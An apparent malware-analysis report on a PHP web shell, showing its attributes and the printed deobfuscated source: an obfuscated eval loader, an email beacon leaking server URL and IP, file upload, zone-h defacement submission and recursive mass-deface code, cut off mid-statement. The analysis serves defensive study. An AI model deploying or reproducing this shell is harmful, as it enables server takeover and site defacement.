PHP Malware Analysis
x.php
md5: aa2aa46aeb16616812137f5336e8ec7f
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- mecus.mecus.mecus@gmail.com (Deobfuscated, Traces)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
Environment
- error_reporting (Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- set_time_limit (Traces)
Execution
- eval (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- Comming ucUs Sh3LL V.2 (Deobfuscated, HTML, Traces)
URLs
- http://localhost/uploads/x.php (Traces)
- http://www.zone-h.com/notify/single (Deobfuscated, Traces)
- http://www.zone-h.org/archive/notifier= (Deobfuscated)
- http://www.zone-h.org/archive/notifier=$nick (Traces)
- http://www.zone-h.org/archive/notifier=$nick/published=0 (Traces)
- https://c.top4top.net/p_11004tbku0.gif (Deobfuscated, HTML, Traces)
- https://fonts.googleapis.com/css?family=Supermercado+One& (HTML)
- https://fonts.googleapis.com/css?family=Supermercado+One&display=swap (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
/*
Code Successfully Obfuscated By tools.sadcode.org Obfuscator :-)
Thanks For Using :D
*/
$ObFus_Sad = "ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJFNhZF9UbzBMcykpKSkpOw";
$Sad_To0Ls = "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";
eval("?><?php\r\n@ini_set('output_buffering', 0);\r\n@ini_set('display_errors', 0);\r\nset_time_limit(0);\r\nini_set('memory_limit', '64M');\r\nheader('Content-Type: text/html; charset=UTF-8');\r\n\$tujuanmail = 'mecus.mecus.mecus@gmail.com';\r\n\$x_path = \"http://\" . \$_SERVER['SERVER_NAME'] . \$_SERVER['REQUEST_URI'];\r\n\$pesan_alert = \"fix \$x_path :p *IP Address : [ \" . \$_SERVER['REMOTE_ADDR'] . \" ]\";\r\nmail(\$tujuanmail, \"LOGGER\", \$pesan_alert, \"[ \" . \$_SERVER['REMOTE_ADDR'] . \" ]\");\r\n?>\r\n<?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach(\$_POST as \$key=>\$value){\r\n\$_POST[\$key] = stripslashes(\$value);\r\n}\r\n}\r\necho '<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n\r\n<link href=\"https://fonts.googleapis.com/css?family=Supermercado+One&display=swap\" rel=\"stylesheet\">\r\n<title>Comming ucUs Sh3LL V.2</title>\r\n<style>\r\nbody{\r\nfont-family:Supermercado One, sans-serif;\r\nbackground-color: #000022;\r\nbackground-image: url();\r\nbackground-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;\r\ncolor: white;\r\n}\r\n#content tr:hover{\r\nbackground-color: black;\r\ntext-shadow:0px 0px 10px black;\r\n}\r\n#content .first{\r\nbackground-color: white;\r\n}\r\ntable{\r\nborder: 1px #000000 dotted;\r\n}\r\na{\r\ncolor: #00FF66;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:blue;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n.lazy {\r\n margin: 0;\r\n font-family:Supermercado One;\r\n}\r\n</style>\r\n</head>\r\n</body>\r\n<body>\r\n<h1><center><img src=\"https://c.top4top.net/p_11004tbku0.gif\" height=\"350 width=\"350\"><font color=\"white\" face=\"\"><div class=\"lazy\">Comming ucUs SH3LL V.2</font></center></h1>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr><td><font color=\"white\">Path :</font> ';\r\nif(isset(\$_GET['path'])){\r\n\$path = \$_GET['path'];\r\n}else{\r\n\$path = getcwd();\r\n}\r\n\$path = str_replace('\\\\','/',\$path);\r\n\$paths = explode('/',\$path);\r\n\r\nforeach(\$paths as \$id=>\$pat){\r\nif(\$pat == '' && \$id == 0){\r\n\$a = true;\r\necho '<a href=\"?path=/\">/</a>';\r\ncontinue;\r\n}\r\nif(\$pat == '') continue;\r\necho '<a href=\"?path=';\r\nfor(\$i=0;\$i<=\$id;\$i++){\r\necho \"\$paths[\$i]\";\r\nif(\$i != \$id) echo \"/\";\r\n}\r\necho '\">'.\$pat.'</a>/';\r\n}\r\necho '</td></tr><tr><td>';\r\nif(isset(\$_FILES['file'])){\r\nif(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){\r\necho '<font color=\"green\">Berhasil Njeng!!!</font><br />';\r\n}else{\r\necho '<font color=\"red\">Gagal Njeng!!!</font><br/>';\r\n}\r\n}\r\n\tif(isset(\$_GET['dir'])) {\r\n\t\$dir = \$_GET['dir'];\r\n\tchdir(\$dir);\r\n} else {\r\n\t\$dir = getcwd();\r\n}\r\n\$ip = gethostbyname(\$_SERVER['HTTP_HOST']);\r\n\$kernel = php_uname();\r\n\$ds = @ini_get(\"disable_functions\");\r\n\$show_ds = (!empty(\$ds)) ? \"<font color=red>\$ds</font>\" : \"<font color=#00FF66>Bersih Njeng!</font>\";\r\nif(!function_exists('posix_getegid')) {\r\n\t\$user = @get_current_user();\r\n\t\$uid = @getmyuid();\r\n\t\$gid = @getmygid();\r\n\t\$group = \"?\";\r\n} else {\r\n\t\$uid = @posix_getpwuid(posix_geteuid());\r\n\t\$gid = @posix_getgrgid(posix_getegid());\r\n\t\$user = \$uid['name'];\r\n\t\$uid = \$uid['uid'];\r\n\t\$group = \$gid['name'];\r\n\t\$gid = \$gid['gid'];\r\n}\r\necho \"Disable Functions : \$show_ds<br>\";\r\necho \"System : <font color=#00FF66>\".\$kernel.\"</font><br>\";\r\necho \"<center>\";\r\necho \"<hr>\";\r\necho \"[ <a href='?'>Home</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=zoneh'>Zone-h</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=jumping'>Jumping</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=sym'>Symlink</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=mass'>Mass Depes</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=cmd'>Command</a> ]\";\r\necho \"</center>\";\r\necho \"<hr>\";\r\nif(\$_GET['to'] == 'zoneh') {\r\n\tif(\$_POST['submit']) {\r\n\t\t\$domain = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\t\$nick = \$_POST['nick'];\r\n\t\techo \"Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=\$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=\$nick/published=0</a><br>\";\r\n\t\techo \"Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=\$nick' target='_blank'>http://www.zone-h.org/archive/notifier=\$nick</a><br><br>\";\r\n\t\tfunction zoneh(\$url,\$nick) {\r\n\t\t\t\$ch = curl_init(\"http://www.zone-h.com/notify/single\");\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POST, true);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POSTFIELDS, \"defacer=\$nick&domain1=\$url&hackmode=1&reason=1&submit=Send\");\r\n\t\t\treturn curl_exec(\$ch);\r\n\t\t\t\t curl_close(\$ch);\r\n\t\t}\r\n\t\tforeach(\$domain as \$url) {\r\n\t\t\t\$zoneh = zoneh(\$url,\$nick);\r\n\t\t\tif(preg_match(\"/color=\\\"red\\\">OK<\\/font><\\/li>/i\", \$zoneh)) {\r\n\t\t\t\techo \"\$url -> <font color=lime>OK</font><br>\";\r\n\t\t\t} else {\r\n\t\t\t\techo \"\$url -> <font color=red>ERROR</font><br>\";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center><form method='post'>\r\n\t\t<u>Defacer</u>: <br>\r\n\t\t<input type='text' name='nick' size='50' value='MecUs7'><br>\r\n\t\t<u>Domains</u>: <br>\r\n\t\t<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>\r\n\t\t<input type='submit' name='submit' value='Submit' style='width: 450px;'>\r\n\t\t</form>\";\r\n\t}\r\n\techo \"</center>\";\r\n} elseif(\$_GET['to'] == 'mass') {\r\n\tfunction sabun_massal(\$dir,\$namafile,\$isi_script) {\r\n\t\tif(is_writable(\$dir)) {\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\t\$lokasi = \$dirc.'/'.\$namafile;\r\n\t\t\t\tif(\$dirb === '.') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\t\techo \"[<font color=lime>DONE</font>] \$lokasi<br>\";\r\n\t\t\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t\t\t\t\$idx = sabun_massal(\$dirc,\$namafile,\$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa(\$dir,\$namafile,\$isi_script) {\r\n\t\tif(is_writable(\$dir)) {\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\t\$lokasi = \$dirc.'/'.\$namafile;\r\n\t\t\t\tif(\$dirb === '.') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\t\techo \"[<font color=lime>DONE</font>] \$dirb/\$namafile<br>\";\r\n\t\t\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(\$_POST['start']) {\r\n\t\tif(\$_POST['tipe_sabun'] == 'mahal') {\r\n\t\t\techo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\t\t\tsabun_massal(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t\t\techo \"</div>\";\r\n\t\t} elseif(\$_POST['tipe_sabun'] == 'murah') {\r\n\t\t\techo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\t\t\tsabun_biasa(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t\t\techo \"</div>\";\r\n\t\t}\r\n\t} else {\r\n\techo \"<center>\";\r\n\techo \"<form method='post'>\r\n\t<font style='text-decoration: underline;'>Tipe Mass:</font><br>\r\n\t<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>\r\n\t<font style='text-decoration: underline;'>Folder:</font><br>\r\n\t<input type='text' name='d_dir' value='\$dir' style='width: 450px;' height='10'><br>\r\n\t<font style='text-decoration: underline;'>Filename:</font><br>\r\n\t<input type='text' name='d_file' value='ucUs7.php' style='width: 450px;' height='10'><br>\r\n\t<font style='text-decoration: underline;'>Index File:</font><br>\r\n\t<textarea name='script' style='width: 450px; height: 200px;'>Hacked By MecUs7</textarea><br>\r\n\t<input type='submit' name='start' value='HAJAR COK!' style='width: 450px;'>\r\n\t</form></center>\";\r\n\t} \r\n\t}elseif(\$_GET['to'] == 'sym') {\r\necho 